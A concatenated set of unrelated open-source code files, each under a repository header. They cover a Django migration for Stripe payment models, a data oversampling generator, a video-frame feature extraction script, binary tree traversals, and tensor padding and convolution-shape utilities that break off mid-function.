('message', models.CharField(max_length=500)),
('traceback', models.TextField()),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Invoice',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount_due', models.DecimalField(decimal_places=2, max_digits=9)),
('attempted', models.NullBooleanField()),
('attempt_count', models.PositiveIntegerField(blank=True, null=True)),
('statement_descriptor', models.TextField(blank=True)),
('currency', models.CharField(default='usd', max_length=10)),
('closed', models.BooleanField(default=False)),
('description', models.TextField(blank=True)),
('paid', models.BooleanField(default=False)),
('receipt_number', models.TextField(blank=True)),
('period_end', models.DateTimeField()),
('period_start', models.DateTimeField()),
('subtotal', models.DecimalField(decimal_places=2, max_digits=9)),
('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('total', models.DecimalField(decimal_places=2, max_digits=9)),
('date', models.DateTimeField()),
('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)),
('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')),
],
options={
'abstract': False,
},
bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),
),
migrations.CreateModel(
name='InvoiceItem',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=255)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('currency', models.CharField(default='usd', max_length=10)),
('kind', models.CharField(blank=True, max_length=25)),
('period_start', models.DateTimeField()),
('period_end', models.DateTimeField()),
('proration', models.BooleanField(default=False)),
('line_type', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=200)),
('quantity', models.IntegerField(blank=True, null=True)),
('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Plan',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('currency', models.CharField(max_length=15)),
('interval', models.CharField(max_length=15)),
('interval_count', models.IntegerField()),
('name', models.CharField(max_length=150)),
('statement_descriptor', models.TextField(blank=True)),
('trial_period_days', models.IntegerField(blank=True, null=True)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)),
('cancel_at_period_end', models.BooleanField(default=False)),
('canceled_at', models.DateTimeField(blank=True, null=True)),
('current_period_end', models.DateTimeField(blank=True, null=True)),
('current_period_start', models.DateTimeField(blank=True, null=True)),
('ended_at', models.DateTimeField(blank=True, null=True)),
('quantity', models.IntegerField()),
('start', models.DateTimeField()),
('status', models.CharField(max_length=25)),
('trial_end', models.DateTimeField(blank=True, null=True)),
('trial_start', models.DateTimeField(blank=True, null=True)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')),
('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')),
],
options={
'abstract': False,
},
bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),
),
migrations.CreateModel(
name='Transfer',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('created', models.DateTimeField(blank=True, null=True)),
('currency', models.CharField(default='usd', max_length=25)),
('date', models.DateTimeField()),
('description', models.TextField(blank=True, null=True)),
('destination', models.TextField(blank=True, null=True)),
('destination_payment', models.TextField(blank=True, null=True)),
('failure_code', models.TextField(blank=True, null=True)),
('failure_message', models.TextField(blank=True, null=True)),
('livemode', models.BooleanField(default=False)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('method', models.TextField(blank=True, null=True)),
('reversed', models.BooleanField(default=False)),
('source_transaction', models.TextField(blank=True, null=True)),
('source_type', models.TextField(blank=True, null=True)),
('statement_descriptor', models.TextField(blank=True, null=True)),
('status', models.CharField(max_length=25)),
('transfer_group', models.TextField(blank=True, null=True)),
('type', models.TextField(blank=True, null=True)),
('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')),
('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TransferChargeFee',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('currency', models.CharField(default='usd', max_length=10)),
('application', models.TextField(blank=True, null=True)),
('description', models.TextField(blank=True, null=True)),
('kind', models.CharField(max_length=150)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='UserAccount',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='invoiceitem',
name='plan',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'),
),
migrations.AddField(
model_name='invoiceitem',
name='subscription',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'),
),
migrations.AddField(
model_name='invoice',
name='subscription',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'),
),
migrations.AddField(
model_name='customer',
name='users',
field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='charge',
name='customer',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'),
),
migrations.AddField(
model_name='charge',
name='invoice',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'),
),
migrations.AddField(
model_name='card',
name='customer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'),
),
migrations.AddField(
model_name='bitcoinreceiver',
name='customer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'),
),
migrations.AlterUniqueTogether(
name='useraccount',
unique_together=set([('user', 'account')]),
),
migrations.AlterUniqueTogether(
name='plan',
unique_together=set([('stripe_id', 'stripe_account')]),
),
]
# score: 1.554688 | int_score: 2
# --- src/generators/adasyn.py | Arzik1987/prelim | stars: 2 | id: 12797454 ---
import numpy as np
from imblearn.over_sampling import ADASYN
import warnings
from src.generators.rand import Gen_randu
class Gen_adasyn:
def __init__(self):
self.X_ = None
self.mname_ = "adasyn"
def fit(self, X, y=None, metamodel=None):
self.X_ = X.copy()
return self
def sample(self, n_samples=1):
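        # Approach (descriptive summary of the code below): label the training points
        # as class 1 and n_samples uniform-random points (Gen_randu) as class 0, then
        # let ADASYN oversample the minority class so the synthetic points interpolate
        # the original data; the first n_samples class-1 rows are returned.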
parss = 'not majority'
if self.X_.shape[0] > n_samples:
warnings.warn("The required sample size is smaller than the number of observations in train")
parss = 'all'
        y = np.concatenate((np.ones(self.X_.shape[0]), np.zeros(n_samples)))
X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples)))
Xnew = None
parknn = min(5, n_samples, self.X_.shape[0])
# TODO Inspect
        while not isinstance(Xnew, np.ndarray) and parknn <= n_samples and parknn <= self.X_.shape[0]:
try:
Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y)
except (ValueError, RuntimeError):
parknn = parknn * 2
        if not isinstance(Xnew, np.ndarray):
from imblearn.over_sampling import SMOTE
parknn = min(5, n_samples, self.X_.shape[0])
Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y)
self.mname_ = "adasyns"
else:
self.mname_ = "adasyn"
return Xnew[y == 1,:][0:n_samples,:]
def my_name(self):
return self.mname_
# =============================================================================
# # TEST
#
# from sklearn.datasets import make_classification
# X, y = make_classification(n_samples = 100, n_features = 2, n_informative = 2,
# n_redundant = 0, n_repeated = 0, n_classes = 1,
# random_state = 0)
# import matplotlib.pyplot as plt
# plt.scatter(X[:,0], X[:,1])
#
# ada_gen = Gen_adasyn()
# ada_gen.fit(X)
# df = ada_gen.sample(n_samples = 201)
# plt.scatter(df[:,0], df[:,1])
# =============================================================================
# score: 2.375 | int_score: 2
# --- static/random_initializer.py | ajayKumar99/Dog-Breed-Classifier | stars: 1 | id: 12797455 ---
import random
def initializer():
    """Pick three distinct indices in [0, 119] and three distinct indices in [0, 2]."""
    i = random.randint(0, 119)
while True:
j = random.randint(0 , 119)
if i != j:
break
while True:
z = random.randint(0 , 119)
if z != i and z != j:
break
k = random.randint(0 ,2)
while True:
l = random.randint(0 , 2)
if l != k:
break
while True:
m = random.randint(0 , 2)
if m != k and m != l:
break
return i , j , z , k , l , m
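# An equivalent, more idiomatic sketch (assuming the only requirement is three
# distinct indices per range) would use random.sample:
#
# def initializer():
#     i, j, z = random.sample(range(120), 3)
#     k, l, m = random.sample(range(3), 3)
#     return i, j, z, k, l, m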
# score: 2.703125 | int_score: 3
# --- result_generator/result_feature_db/index_sift_color.py | shijack/feature_extract | stars: 1 | id: 12797456 ---
# coding=utf-8
import os
import shutil
import time
def get_dirs_child(path):
return [os.path.join(path, f) for f in os.listdir(path)]
def get_all_files_suffix(path, file_suffix='.jpg'):
all_file = []
for dirpath, dirnames, filenames in os.walk(path):
for name in filenames:
if name.endswith(file_suffix):
all_file.append(os.path.join(dirpath, name))
return all_file
def copyFiles(file_imgs, targetDir):
list_imgs = []
with open(file_imgs, 'r') as f:
list_imgs_tmp = f.readlines()
for item_img in list_imgs_tmp:
list_imgs.append(
item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs',
'/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip())
if not os.path.exists(targetDir):
os.makedirs(targetDir)
for eachfile in list_imgs:
if not os.path.exists(eachfile):
print "src path not exist:" + eachfile
print "error!! attation!"
return -1
shutil.copy(eachfile, targetDir + os.path.basename(eachfile))
print eachfile + " copy succeeded!"
# Reference invocations of the external tool (kept as comments for documentation;
# the original code assigned one to an unused variable and left the other as a no-op
# string statement):
# /usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash
# /usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash
def feature_generator_sift_color(dir_img):
dir_child_list = get_dirs_child(dir_img)
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
start_time = time.time()
for i, img_path in enumerate(dir_child_list):
names = []
img_names = get_all_files_suffix(img_path)
        for j, item_name in enumerate(img_names):
            names.append(item_name + '\n')  # add newline so writelines() keeps one name per line
newname = os.path.dirname(item_name) + '/%05d' % (j + 1)
os.rename(item_name, newname + ".jpg")
img_names = get_all_files_suffix(img_path)
print len(img_names)
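        # videofpget_bow_hash is an external binary (expected under /usr/local/bin)
        # that, judging from the arguments, reads frames 00001.jpg..NNNNN.jpg from
        # img_path and writes a SIFT bag-of-words file (.bow) and an ITQ hash file
        # (.hash) using the given codebook/ITQ model binaries.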
fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len(
img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname(
img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[
-1] + '.hash'
os.system(fp_pick)
with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file:
name_file.writelines(names)
print "extracting feature from image No. %d , %d dirs in total" % ((i + 1), len(dir_child_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
print "--------------------------------------------------"
print " feature extraction ends ..."
print "--------------------------------------------------"
def feature_generator_query(target_dir):
'''
    Given the list of image files, generate the .bow / .hash / .txt data used by
    the online system for query video frames.
    :param target_dir: must end with /
:return:
'''
copyFiles('./test_2000.txt', target_dir)
feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../')))
if __name__ == "__main__":
query_dir_imgs = '/opt/dongsl/tmp2/tmp/'
feature_generator_query(query_dir_imgs)
# score: 2.78125 | int_score: 3
# --- tree-walk.py | rabindra-harlalka/my-programs | stars: 0 | id: 12797457 ---
from typing import Callable
from queue import Queue
"""A type of depth-first walk of a tree (parent, left, right)"""
def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):
if node is not None:
result.append(node)
if left(node) is not None:
pre_order_walk(left(node), result, left, right, parent)
if right(node) is not None:
pre_order_walk(right(node), result, left, right, parent)
"""A type of depth-first walk of a tree (left, parent, right)"""
def in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):
if node is not None:
if left(node) is not None:
in_order_walk(left(node), result, left, right, parent)
result.append(node)
if right(node) is not None:
in_order_walk(right(node), result, left, right, parent)
"""A type of depth-first walk of a tree (left, right, parent)"""
def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):
if node is not None:
if left(node) is not None:
post_order_walk(left(node), result, left, right, parent)
if right(node) is not None:
post_order_walk(right(node), result, left, right, parent)
result.append(node)
def add_child(node, child_node):
if not "left" in node:
node["left"] = child_node
child_node["parent"] = node
elif not "right" in node:
node["right"] = child_node
child_node["parent"] = node
else:
raise Exception("parent node is full")
def is_full(node) -> bool:
return "left" in node and "right" in node
def make_node(data):
node = { "data" : data }
return node
def make_tree(items: list):
tree = []
q = Queue()
    current_parent = None  # the queue is empty at this point, so there is no parent yet
for item in items:
print('DEBUG: adding item %s' % item)
node = make_node(item)
q.put(node)
tree.append(node)
if current_parent is not None:
            if is_full(current_parent):
current_parent = q.get(block=False)
add_child(current_parent, node)
else:
current_parent = q.get(block=False)
return tree
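# make_tree builds a complete binary tree in level order: every new node is pushed
# onto a FIFO queue and attached to the earliest dequeued parent that still has a
# free child slot.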
def print_tree(tree: list):
for node in tree:
parent = node["parent"]["data"] if "parent" in node else None
left = node["left"]["data"] if "left" in node else None
right = node["right"]["data"] if "right" in node else None
print("%s <- %s: %s %s" % (parent, node["data"], left, right))
def print_tree_minimal(tree: list):
for node in tree:
print("%s" % node["data"], end=' ')
print()
def main():
tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10, 9, 19, 18, 14, 7, 4, 13, 11])
print_tree(tree)
pre_order_walk_result = []
pre_order_walk(tree[0], pre_order_walk_result,
left=lambda node: node["left"] if "left" in node else None,
right=lambda node: node["right"] if "right" in node else None,
parent=lambda node: node["parent"] if "parent" in node else None)
print_tree_minimal(pre_order_walk_result)
in_order_walk_result = []
in_order_walk(tree[0], in_order_walk_result,
left=lambda node: node["left"] if "left" in node else None,
right=lambda node: node["right"] if "right" in node else None,
parent=lambda node: node["parent"] if "parent" in node else None)
print_tree_minimal(in_order_walk_result)
post_order_walk_result = []
post_order_walk(tree[0], post_order_walk_result,
left=lambda node: node["left"] if "left" in node else None,
right=lambda node: node["right"] if "right" in node else None,
parent=lambda node: node["parent"] if "parent" in node else None)
print_tree_minimal(post_order_walk_result)
if __name__ == "__main__":
    main()
# score: 3.984375 | int_score: 4
# --- polymath/srdfg/templates/template_utils.py | lite-david/polymath | stars: 15 | id: 12797458 ---
import polymath as pm
import numpy as np
def format_idx(x, reverse=True):
if reverse:
return tuple(list(reversed(x)))
else:
return tuple(x)
def _get_indices(node, all_indices, tgt_shape):
indices = []
if node.shape == pm.DEFAULT_SHAPES[0]:
return tuple(indices)
for idx, i in enumerate(all_indices):
if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]:
indices.append(i)
if tgt_shape != node.shape:
for idx, i in enumerate(node.shape):
if i != tgt_shape[idx]:
indices.insert(idx, 0)
return tuple(indices)
def _get_binop_idx(node_a, node_b, out_node):
# TODO: Figure out what to do about multiple dimensions with the same value
cnt = 0
op1 = []
op2 = []
all_ops = []
for i in node_a.shape:
if i == 1:
op1.append(0)
# all_ops.append(0)
else:
idx = pm.index(0, i - 1)
op1.append(idx)
all_ops.append(idx)
cnt += 1
for i in node_b.shape:
if i in node_a.shape:
idx = node_a.shape.index(i)
op2.append(op1[idx])
elif i == 1:
op2.append(0)
# all_ops.append(0)
else:
idx = pm.index(0, i - 1)
op2.append(idx)
all_ops.append(idx)
cnt += 1
if out_node.is_shape_finalized():
all_ops = []
for s in out_node.shape:
if s in node_a.shape:
idx = node_a.shape.index(s)
all_ops.append(idx)
else:
assert s in node_b.shape, f"Output shape value {s} not in other shapes"
idx = node_b.shape.index(s)
all_ops.append(idx)
return op1, op2, all_ops
def _get_single_node_indices(node, shape=None):
if node.shape == pm.DEFAULT_SHAPES[0]:
return tuple([])
else:
if not shape:
shape = node.shape
indices = tuple([pm.index(0, s - 1) for s in shape])
return indices
def _get_reduce_node_indices(a, b, output, axis):
if output.shape == pm.DEFAULT_SHAPES[0]:
return tuple([])
else:
if not output.shape:
raise RuntimeError
indices = tuple([pm.index(0, s - 1) for s in output.shape])
return indices
def is_broadcastable(shp1, shp2):
for a, b in zip(shp1[::-1], shp2[::-1]):
if a == 1 or b == 1 or a == b:
pass
else:
return False
return True
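# e.g. is_broadcastable((8, 1, 6), (7, 6)) -> True  (they would broadcast to (8, 7, 6)),
#      is_broadcastable((4, 3), (4,))      -> False (trailing dims 3 and 4 conflict)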
# Use numpy broadcasting rules
def _get_elem_indices(node_a, node_b, node_c, zero_indices=True):
broadcastable = is_broadcastable(node_a.shape, node_b.shape)
a_idx = []
b_idx = []
out_idx = []
nmap = {}
reverse = True
if not broadcastable:
reverse = False
a_idx = [None] * len(node_a.shape)
b_idx = [None] * len(node_b.shape)
a_map = {}
b_map = {}
for s in node_c.shape:
idx = pm.index(0, s - 1)
out_idx.append(idx)
if s in node_a.shape:
start = 0
if s in a_map:
start = a_map[s]
sidx = node_a.shape.index(s, start)
a_idx[sidx] = idx
a_map[s] = sidx
if s in node_b.shape:
start = 0
if s in b_map:
start = b_map[s]
sidx = node_b.shape.index(s, start)
b_idx[sidx] = idx
b_map[s] = sidx
for i in range(len(a_idx)):
if a_idx[i] is None:
assert node_a.shape[i] == 1
a_idx[i] = 0
for i in range(len(b_idx)):
if b_idx[i] is None:
assert node_b.shape[i] == 1
b_idx[i] = 0
else:
if node_a.shape == node_b.shape and node_c.shape == node_a.shape:
indices = _get_single_node_indices(node_a)
return indices, indices, indices
elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]:
idx = format_idx([])
return idx, idx, idx
elif node_a.shape == pm.DEFAULT_SHAPES[0]:
idx = format_idx([])
indices = _get_single_node_indices(node_b)
return idx, indices, indices
elif node_b.shape == pm.DEFAULT_SHAPES[0]:
idx = format_idx([])
indices = _get_single_node_indices(node_a)
return indices, idx, indices
if len(node_a.shape) > len(node_b.shape):
small_node = node_b
lg_node = node_a
nmap["small"] = b_idx
nmap["large"] = a_idx
else:
small_node = node_a
lg_node = node_b
nmap["small"] = a_idx
nmap["large"] = b_idx
for i in range(-1, -len(lg_node.shape) - 1, -1):
if len(small_node.shape) < abs(i):
idx = pm.index(0, lg_node.shape[i] - 1)
nmap["large"].append(idx)
out_idx.append(idx)
elif node_a.shape[i] == node_b.shape[i]:
if node_a.shape[i] != 1:
idx = pm.index(0, node_a.shape[i] - 1)
a_idx.append(idx)
b_idx.append(idx)
out_idx.append(idx)
elif node_a.shape[i] == 1:
idx = pm.index(0, node_b.shape[i] - 1)
if zero_indices:
a_idx.append(0) # TESTING
b_idx.append(idx)
out_idx.append(idx)
elif node_b.shape[i] == 1:
idx = pm.index(0, node_a.shape[i] - 1)
a_idx.append(idx)
if zero_indices:
b_idx.append(0) # TESTING
out_idx.append(idx)
else:
raise RuntimeError(f"Unable to broadcast indices:\n"
f"{node_a.name}: {node_a.shape}\n"
f"{node_b.name}: {node_b.shape}\n")
return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse)
def dilate(var: pm.placeholder, strides, name=None):
n = len(var.shape)
assert len(strides) == n
out_shape = ()
nz_indices = ()
shape_idx = ()
for i in range(n):
out_shape += ((var.shape[i] - 1) * strides[i] + 1,)
nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),)
shape_idx += (pm.index(0, out_shape[i] - 1),)
padded = pm.temp(name=name, shape=out_shape)
    padded[shape_idx] = 0
    # TODO: incomplete: the values of `var` still need to be scattered onto the strided
    # positions indexed by `nz_indices` (computed above but unused), and `padded` is
    # never returned
# def get_pad_tuple(pad_size):
# if isinstance(pad_size, (tuple, list)):
# if len(pad_size) == 2:
# pad_h = pad_size[0] * 2
# pad_w = pad_size[1] * 2
# elif len(pad_size) == 4:
# return pad_size[0], pad_size[2], pad_size[1], pad_size[3]
# else:
# raise ValueError("Size of padding can only be 2 or 4")
# else:
# assert isinstance(pad_size, int)
# pad_h = pad_w = pad_size * 2
#
# pad_top = (pad_h + 1) // 2
# pad_left = (pad_w + 1) // 2
# return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left
def get_pad_tuple(padding, kernel):
"""Common code to get the pad option
Parameters
----------
    padding : tuple of int
        (pad_h, pad_w) padding amounts; the implementation indexes padding[0] and padding[1]
kernel : tuple of int
Conv kernel size
Returns
-------
pad_top : int
Padding size on top
pad_left : int
Padding size on left
pad_down : int
Padding size on down.
pad_right : int
Padding size on right.
"""
# pad_h = pad_w = padding * 2
pad_h = padding[0] * 2
pad_w = padding[1] * 2
pad_top = (pad_h + 1) // 2
pad_left = (pad_w + 1) // 2
return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left
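# Worked example (hedged): padding (1, 2) gives pad_h = 2 and pad_w = 4, so
# get_pad_tuple((1, 2), (3, 3)) returns (1, 2, 1, 2).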
def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0):
assert len(data.shape) == 4
    # get_pad_tuple returns (top, left, down, right); unpack in that order.
    p_top, p_left, p_bottom, p_right = get_pad_tuple(pad_size, kernel)
oh = data.shape[2] + p_top + p_bottom
ow = data.shape[3] + p_left + p_right
padded_shape = (data.shape[0], data.shape[1], oh, ow)
if padded_out.is_shape_finalized() and padded_out.shape != (1,):
assert padded_shape == padded_out.shape, f"Unequal shapes for padding:\n" \
f"Target shape: {padded_shape}\n" \
f"Set shape: {padded_out.shape}"
padded_out.set_shape(padded_shape)
n_idx = pm.index(0, data.shape[0]-1)
c_idx = pm.index(0, data.shape[1]-1)
oh_idx = pm.index(0, oh-1)
ih_idx = pm.index(0, data.shape[2]-1)
ow_idx = pm.index(0, ow-1)
iw_idx = pm.index(0, data.shape[3] - 1)
padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val
padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)]
return padded_out
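# Example (hedged): data of shape (1, 1, 4, 4) with pad_size (1, 1) yields one
# pixel of padding on every side, so padded_out has shape (1, 1, 6, 6) with
# `data` written into the interior window.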
def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations):
assert np.prod(data.shape) == np.prod(shape)
assert len(dim_combinations) == len(shape)
src_indices = []
dst_indices = []
for s in data.shape:
idx = pm.index(0, s-1)
src_indices.append(idx)
    # Flatten each group of source dims into a single destination index, e.g.
    # for a group (d0, d1): idx = src_indices[d0] * shape[d1] + src_indices[d1].
    for dc in reversed(dim_combinations):
        idx = 0
        idx_offset = 1
        for d in reversed(dc):
            idx = src_indices[d] * idx_offset + idx
            idx_offset *= data.shape[d]
        dst_indices.insert(0, idx)
    reshaped_out[tuple(dst_indices)] = data[tuple(src_indices)]
    return reshaped_out
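# Example (hedged, matching the flattening above): data shape (2, 3, 4)
# reshaped to (6, 4) with dim_combinations [[0, 1], [2]] maps source index
# (i, j, k) to destination index (i * 3 + j, k).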
def _get_indices_for_dim(x, dim):
    assert dim < len(x.shape)
idx = pm.index(0, x.shape[dim] - 1)
return idx
def _dim_explicit(a_shp, dim):
if dim is None:
return dim
if dim < 0:
dim = len(a_shp) + dim
return dim
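# Example: _dim_explicit((2, 3, 4), -1) == 2, and a dim of None passes through.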
def _get_conv_shape_1axis(
image_shape, kernel_shape, border_mode, subsample, dilation=1
):
"""This function compute the output shape of convolution operation.
Copied and simplified from theano (2020/11/08):
https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py
Parameters
----------
image_shape: int
Corresponds to the input image shape on a given axis.
kernel_shape: int
Corresponds to the kernel shape on a given axis.
border_mode: string or int. If it is a string, it must be
'valid' or 'full'.
subsample: int. It must correspond to the subsampling on the
considered axis.
dilation: int. It must correspond to the dilation on the
considered axis.
Returns
-------
out_shp: int corresponding to the output image shape on the
considered axis.
"""
# Implicit dilated kernel shape
dil_kernel_shape = (kernel_shape - 1) * dilation + 1
if border_mode == "full":
pad_l = pad_r = dil_kernel_shape - 1
elif border_mode == "valid":
pad_l = pad_r = 0
else:
assert border_mode >= 0
pad_l = pad_r = border_mode
# In case of symbolic shape, we want to build the smallest graph
# (image_shape + 2 * pad - dil_kernel_shape) // subsample + 1
out_shp = image_shape - dil_kernel_shape
if pad_l != 0:
out_shp += pad_l
if pad_r != 0:
out_shp += pad_r
if subsample != 1:
out_shp = out_shp // subsample
out_shp = out_shp + 1
return out_shp
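# Worked example: image_shape=7, kernel_shape=3, border_mode=1 (one pixel of
# padding per side), subsample=2, dilation=1 gives (7 + 2 - 3) // 2 + 1 = 4.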
def _get_conv_output_shape(
    image_shape, kernel_shape, border_mode, subsample, filter_dilation=(1, 1)
):
"""This function compute the output shape of convolution operation.
Copied and simplified from Theano (2020/11/08):
https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py
Parameters
----------
image_shape: tuple of int corresponding to the input
    image shape. Its four (or five) elements must correspond respectively
to: batch size, number of input channels, height and width (and
possibly depth) of the image. None where undefined.
kernel_shape: tuple of int corresponding to the
kernel shape. For a normal convolution, its four (for 2D convolution)
or five (for 3D convolution) elements must correspond respectively to :
number of output channels, number of input channels, height and width
(and possibly depth) of the kernel.
    For an unshared 2D convolution, its six elements must correspond to:
number of output channels, height and width of the output, number of
input channels, height and width of the kernel.
None where undefined.
border_mode: string, or tuple of int. If it is a string, it must be 'valid'
or 'full'. If it is a tuple, its two (or three) elements respectively
correspond to the padding on height and width (and possibly depth)
axis.
subsample: tuple of int. Its two or three elements
respectively correspond to the subsampling on height and width (and
possibly depth) axis.
filter_dilation: tuple of int. Its two or three
elements correspond respectively to the dilation on height and width axis.
Returns
-------
output_shape: tuple of int corresponding to the output image shape. Its
    four elements must correspond respectively to: batch size, number of
output channels, height and width of the image.
"""
bsize, imshp = image_shape[0], image_shape[2:]
convdim = len(image_shape) - 2
nkern, kshp = kernel_shape[0], kernel_shape[-convdim:]
if isinstance(border_mode, tuple):
out_shp = tuple(
_get_conv_shape_1axis(
imshp[i],
kshp[i],
border_mode[i],
subsample[i],
filter_dilation[i],
)
for i in range(len(subsample))
)
else:
out_shp = tuple(
_get_conv_shape_1axis(
imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i]
)
for i in range(len(subsample))
)
